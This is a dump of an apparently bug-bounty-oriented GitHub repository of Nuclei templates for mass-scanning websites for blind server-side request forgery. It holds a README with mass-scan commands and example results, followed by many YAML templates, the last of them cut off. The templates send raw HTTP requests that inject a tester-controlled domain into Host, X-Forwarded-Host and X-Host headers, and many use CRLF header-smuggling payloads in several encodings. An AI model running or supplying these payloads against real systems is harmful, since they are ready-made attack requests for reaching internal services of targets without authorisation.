├── 1.jpg
├── 2.jpg
├── 3.jpg
├── 4.jpg
├── 5.jpg
├── 6.jpg
├── README.md
└── Templates
├── BlindSSRF-1.yaml
├── BlindSSRF-10.yaml
├── BlindSSRF-100.yaml
├── BlindSSRF-101.yaml
├── BlindSSRF-102.yaml
├── BlindSSRF-103.yaml
├── BlindSSRF-104.yaml
├── BlindSSRF-105.yaml
├── BlindSSRF-106.yaml
├── BlindSSRF-107.yaml
├── BlindSSRF-108.yaml
├── BlindSSRF-109.yaml
├── BlindSSRF-11.yaml
├── BlindSSRF-110.yaml
├── BlindSSRF-111.yaml
├── BlindSSRF-112.yaml
├── BlindSSRF-113.yaml
├── BlindSSRF-114.yaml
├── BlindSSRF-115.yaml
├── BlindSSRF-116.yaml
├── BlindSSRF-117.yaml
├── BlindSSRF-118.yaml
├── BlindSSRF-119.yaml
├── BlindSSRF-12.yaml
├── BlindSSRF-120.yaml
├── BlindSSRF-121.yaml
├── BlindSSRF-122.yaml
├── BlindSSRF-123.yaml
├── BlindSSRF-124.yaml
├── BlindSSRF-125.yaml
├── BlindSSRF-126.yaml
├── BlindSSRF-127.yaml
├── BlindSSRF-128.yaml
├── BlindSSRF-129.yaml
├── BlindSSRF-13.yaml
├── BlindSSRF-130.yaml
├── BlindSSRF-131.yaml
├── BlindSSRF-132.yaml
├── BlindSSRF-133.yaml
├── BlindSSRF-134.yaml
├── BlindSSRF-135.yaml
├── BlindSSRF-136.yaml
├── BlindSSRF-137.yaml
├── BlindSSRF-138.yaml
├── BlindSSRF-139.yaml
├── BlindSSRF-14.yaml
├── BlindSSRF-140.yaml
├── BlindSSRF-141.yaml
├── BlindSSRF-142.yaml
├── BlindSSRF-143.yaml
├── BlindSSRF-15.yaml
├── BlindSSRF-16.yaml
├── BlindSSRF-17.yaml
├── BlindSSRF-18.yaml
├── BlindSSRF-19.yaml
├── BlindSSRF-2.yaml
├── BlindSSRF-20.yaml
├── BlindSSRF-21.yaml
├── BlindSSRF-22.yaml
├── BlindSSRF-23.yaml
├── BlindSSRF-24.yaml
├── BlindSSRF-25.yaml
├── BlindSSRF-26.yaml
├── BlindSSRF-27.yaml
├── BlindSSRF-28.yaml
├── BlindSSRF-29.yaml
├── BlindSSRF-3.yaml
├── BlindSSRF-30.yaml
├── BlindSSRF-31.yaml
├── BlindSSRF-32.yaml
├── BlindSSRF-33.yaml
├── BlindSSRF-34.yaml
├── BlindSSRF-35.yaml
├── BlindSSRF-36.yaml
├── BlindSSRF-37.yaml
├── BlindSSRF-38.yaml
├── BlindSSRF-39.yaml
├── BlindSSRF-4.yaml
├── BlindSSRF-40.yaml
├── BlindSSRF-41.yaml
├── BlindSSRF-42.yaml
├── BlindSSRF-43.yaml
├── BlindSSRF-44.yaml
├── BlindSSRF-45.yaml
├── BlindSSRF-46.yaml
├── BlindSSRF-47.yaml
├── BlindSSRF-48.yaml
├── BlindSSRF-49.yaml
├── BlindSSRF-5.yaml
├── BlindSSRF-50.yaml
├── BlindSSRF-51.yaml
├── BlindSSRF-52.yaml
├── BlindSSRF-53.yaml
├── BlindSSRF-54.yaml
├── BlindSSRF-55.yaml
├── BlindSSRF-56.yaml
├── BlindSSRF-57.yaml
├── BlindSSRF-58.yaml
├── BlindSSRF-59.yaml
├── BlindSSRF-6.yaml
├── BlindSSRF-60.yaml
├── BlindSSRF-61.yaml
├── BlindSSRF-62.yaml
├── BlindSSRF-63.yaml
├── BlindSSRF-64.yaml
├── BlindSSRF-65.yaml
├── BlindSSRF-66.yaml
├── BlindSSRF-67.yaml
├── BlindSSRF-68.yaml
├── BlindSSRF-69.yaml
├── BlindSSRF-7.yaml
├── BlindSSRF-70.yaml
├── BlindSSRF-71.yaml
├── BlindSSRF-72.yaml
├── BlindSSRF-73.yaml
├── BlindSSRF-74.yaml
├── BlindSSRF-75.yaml
├── BlindSSRF-76.yaml
├── BlindSSRF-77.yaml
├── BlindSSRF-78.yaml
├── BlindSSRF-79.yaml
├── BlindSSRF-8.yaml
├── BlindSSRF-80.yaml
├── BlindSSRF-81.yaml
├── BlindSSRF-82.yaml
├── BlindSSRF-83.yaml
├── BlindSSRF-84.yaml
├── BlindSSRF-85.yaml
├── BlindSSRF-86.yaml
├── BlindSSRF-87.yaml
├── BlindSSRF-88.yaml
├── BlindSSRF-89.yaml
├── BlindSSRF-9.yaml
├── BlindSSRF-90.yaml
├── BlindSSRF-91.yaml
├── BlindSSRF-92.yaml
├── BlindSSRF-93.yaml
├── BlindSSRF-94.yaml
├── BlindSSRF-95.yaml
├── BlindSSRF-96.yaml
├── BlindSSRF-97.yaml
├── BlindSSRF-98.yaml
└── BlindSSRF-99.yaml
/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/1.jpg
--------------------------------------------------------------------------------
/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/2.jpg
--------------------------------------------------------------------------------
/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/3.jpg
--------------------------------------------------------------------------------
/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/4.jpg
--------------------------------------------------------------------------------
/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/5.jpg
--------------------------------------------------------------------------------
/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xAwali/Blind-SSRF/db74e93dc910e87b16721ab6bd436f34ceee48a2/6.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Nuclei Templates to reproduce Cracking the lens's Research
2 |
3 |
4 |
5 | 
6 |
7 |
8 |
9 |
10 | Requirements
11 |
12 | 1 - Read and Watch !
13 |
14 | Cracking the lens's Research
15 |
16 |
17 | 
18 |
19 |
20 |
21 | 2 - Install Nuclei
22 |
23 | Nuclei
24 |
25 |
26 | 
27 |
28 |
29 | 3 - Clone this Repository
30 |
31 | Blind SSRF
32 |
33 |
34 |
35 |
36 | Usage
37 |
38 |
39 | ```sh
40 | sed -i -- 's/- "Your Match"/- "Match Response of Your Domain e.g. Title My Server 0xAwali<\/title>"/' *.yaml
41 | ```
42 |
43 |
44 | ```sh
45 | nuclei -c 300 -list url.txt -bulk-size 50 -retries 3 -timeout 20 -t "/Templates/*.yaml" -var "MY-DOMAIN=domain.com"
46 | ```
47 |
48 |
49 |
50 | <h1 align="center">Keep in Your Mind</h1>
51 | <h4 align="center">don't use {{interactsh-url}} because I noticed a lot of Interaction will take time to happen so You will miss a lot</h4>
52 |
53 |
54 |
55 |
56 |
57 | <h1 align="center">Next Step !</h1>
58 | <h4 align="center">if nuclei matched something , now You have completely SSRF</h4>
59 | <h4 align="center">if nuclei didn't match anything but there is HTTP Interaction happen , now maybe You have Blind SSRF</h4>
60 | <h4 align="center">so try to invest some time and use this blog as reference</h4>
61 |
62 | <h4 align="center">
63 | <img src="https://assetnote.io/images/global/assetnote-logo-centred.svg" width="200px" alt="assetnote">
64 | </h4>
65 |
66 |
67 | <h4 align="center">
68 | <a href="https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/">A Glossary of Blind SSRF Chains</a>
69 | </h4>
70 | <p align="center">
71 | <a href="https://twitter.com/assetnote"><img src="https://img.shields.io/twitter/follow/assetnote?style=social"></a>
72 | </p>
73 |
74 |
75 | <h1 align="center">Results</h1>
76 | <h3 align="center">1 - Completely SSRF</h3>
77 |
78 |
79 | ```sh
80 | GET http://internal-domains.company.com/ HTTP/1.1
81 | Host: company.com
82 | Cache-Control: no-transform
83 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
84 | Accept-Encoding: gzip, deflate
85 | Accept: */*
86 | ```
87 |
88 |
89 | <h3 align="center">
90 | <img src="1.jpg" alt="SSRF" width="700px"></a>
91 | </h3>
92 |
93 | <h3 align="center">
94 | <img src="2.jpg" alt="SSRF" width="700px"></a>
95 | </h3>
96 |
97 | <h3 align="center">
98 | <img src="3.jpg" alt="SSRF" width="700px"></a>
99 | </h3>
100 |
101 | <h3 align="center">
102 | <img src="4.jpg" alt="SSRF" width="700px"></a>
103 | </h3>
104 |
105 |
106 | ```sh
107 | GET http://internal-domains.company.com/ HTTP/1.0
108 | Cache-Control: no-transform
109 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
110 | Accept-Encoding: gzip, deflate
111 | Accept: */*
112 | ```
113 |
114 |
115 |
116 | <h3 align="center">2 - Blind SSRF but there isn't luck to hit internal services</h3>
117 |
118 |
119 | ```sh
120 | GET / HTTP/1.1
121 | Host: company.com @MY-Domain #did you notice that there is a space between company.com and @
122 | Cache-Control: no-transform
123 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
124 | Accept-Encoding: gzip, deflate
125 | Accept: */*
126 | ```
127 |
128 | <h3 align="center">
129 | <img src="5.jpg" alt="SSRF" width="700px"></a>
130 | </h3>
131 |
132 | <h3 align="center">
133 | <img src="6.jpg" alt="SSRF" width="700px"></a>
134 | </h3>
135 |
136 |
137 | ```sh
138 | GET / HTTP/1.1
139 | Host: company.com
140 | X-Forwarded-Host: MY-Domain/.company.com
141 | Cache-Control: no-transform
142 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
143 | Accept-Encoding: gzip, deflate
144 | Accept: */*
145 | ```
146 |
--------------------------------------------------------------------------------
/Templates/BlindSSRF-1.yaml:
--------------------------------------------------------------------------------
1 | id: 0x001
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Host}}.{{Port}}.BSSRF-001.{{MY-DOMAIN}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | matchers:
19 | - type: word
20 | part: body
21 | words:
22 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-10.yaml:
--------------------------------------------------------------------------------
1 | id: 0x010
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | Host: {{Hostname}}
13 | Host: {{Host}}.{{Port}}.BSSRF-010.{{MY-DOMAIN}}
14 | Cache-Control: no-transform
15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | unsafe: true
20 | matchers:
21 | - type: word
22 | part: body
23 | words:
24 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-100.yaml:
--------------------------------------------------------------------------------
1 | id: 0100
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0d%0aX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-100.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-101.yaml:
--------------------------------------------------------------------------------
1 | id: 0x101
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-101.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-102.yaml:
--------------------------------------------------------------------------------
1 | id: 0x102
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0DX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-102.{{MY-DOMAIN}}%0D%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-103.yaml:
--------------------------------------------------------------------------------
1 | id: 0x103
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0AX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-103.{{MY-DOMAIN}}%0A%0A HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-104.yaml:
--------------------------------------------------------------------------------
1 | id: 0x104
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%3F%0DX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-104.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-105.yaml:
--------------------------------------------------------------------------------
1 | id: 0x105
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.10x0D0x0ADX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-105.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
12 | Host: {{Hostname}}
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
14 | Cache-Control: no-transform
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-106.yaml:
--------------------------------------------------------------------------------
1 | id: 0x106
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1\u560d\u560aX-Forwarded-Host:%20{{Host}}.{{Port}}.BSSRF-106.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-107.yaml:
--------------------------------------------------------------------------------
1 | id: 0x107
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0d%0aX-Host:%20{{Host}}.{{Port}}.BSSRF-107.{{MY-DOMAIN}}%0d%0a%0d%0a HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-108.yaml:
--------------------------------------------------------------------------------
1 | id: 0x108
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%E5%98%8D%E5%98%8AX-Host:%20{{Host}}.{{Port}}.BSSRF-108.{{MY-DOMAIN}}%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-109.yaml:
--------------------------------------------------------------------------------
1 | id: 0x109
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0DX-Host:%20{{Host}}.{{Port}}.BSSRF-109.{{MY-DOMAIN}}%0D%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-11.yaml:
--------------------------------------------------------------------------------
1 | id: 0x011
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Host}}.{{Port}}.BSSRF-011.{{MY-DOMAIN}}
13 | X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-011.{{MY-DOMAIN}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-110.yaml:
--------------------------------------------------------------------------------
1 | id: 0x110
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%0AX-Host:%20{{Host}}.{{Port}}.BSSRF-110.{{MY-DOMAIN}}%0A%0A HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-111.yaml:
--------------------------------------------------------------------------------
1 | id: 0x111
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1%3F%0DX-Host:%20{{Host}}.{{Port}}.BSSRF-111.{{MY-DOMAIN}}%3F%0D%3F%0D HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-112.yaml:
--------------------------------------------------------------------------------
1 | id: 0x112
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.10x0D0x0ADX-Host:%20{{Host}}.{{Port}}.BSSRF-112.{{MY-DOMAIN}}0x0D0x0A0x0D0x0A HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-113.yaml:
--------------------------------------------------------------------------------
1 | id: 0x113
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET /%20HTTP/1.1\u560d\u560aX-Host:%20{{Host}}.{{Port}}.BSSRF-113.{{MY-DOMAIN}}\u560d\u560a\u560d\u560a HTTP/1.1
12 | Host: {{Hostname}}
13 | Cache-Control: no-transform
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Accept-Encoding: gzip, deflate
16 | Accept: */*
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-114.yaml:
--------------------------------------------------------------------------------
1 | id: 0x114
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\r\nHost: {{Host}}.{{Port}}.BSSRF-114.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-115.yaml:
--------------------------------------------------------------------------------
1 | id: 0x115
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\nHost: {{Host}}.{{Port}}.BSSRF-115.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-116.yaml:
--------------------------------------------------------------------------------
1 | id: 0x116
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0d%0aHost: {{Host}}.{{Port}}.BSSRF-116.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-117.yaml:
--------------------------------------------------------------------------------
1 | id: 0x117
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0aHost: {{Host}}.{{Port}}.BSSRF-117.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-118.yaml:
--------------------------------------------------------------------------------
1 | id: 0x118
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%0dHost: {{Host}}.{{Port}}.BSSRF-118.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-119.yaml:
--------------------------------------------------------------------------------
1 | id: 0x119
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\rHost: {{Host}}.{{Port}}.BSSRF-119.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-12.yaml:
--------------------------------------------------------------------------------
1 | id: 0x012
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |
11 | GET / HTTP/1.1
12 | Host: {{Host}}.{{Port}}.BSSRF-012.{{MY-DOMAIN}}
13 | X-Forwarded-Host: {{Hostname}}
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
15 | Cache-Control: no-transform
16 | Accept-Encoding: gzip, deflate
17 | Accept: */*
18 |
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-120.yaml:
--------------------------------------------------------------------------------
1 | id: 0x120
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\x0d\x0aHost: {{Host}}.{{Port}}.BSSRF-120.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-121.yaml:
--------------------------------------------------------------------------------
1 | id: 0x121
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0%E5%98%8A%E5%98%8DHost: {{Host}}.{{Port}}.BSSRF-121.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
20 | - type: word
21 | part: body
22 | words:
23 | - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-122.yaml:
--------------------------------------------------------------------------------
1 | id: 0x122
2 |
3 | info:
4 | name: Blind SSRF
5 | author: 0xAwali
6 | severity: info
7 |
8 | requests:
9 | - raw:
10 | - |+
11 | GET / HTTP/1.1
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\u560d\u560aHost: {{Host}}.{{Port}}.BSSRF-122.{{MY-DOMAIN}}
13 | Cache-Control: no-transform
14 | Accept-Encoding: gzip, deflate
15 | Accept: */*
16 | Host: {{Hostname}}
17 |
18 | unsafe: true
19 | matchers:
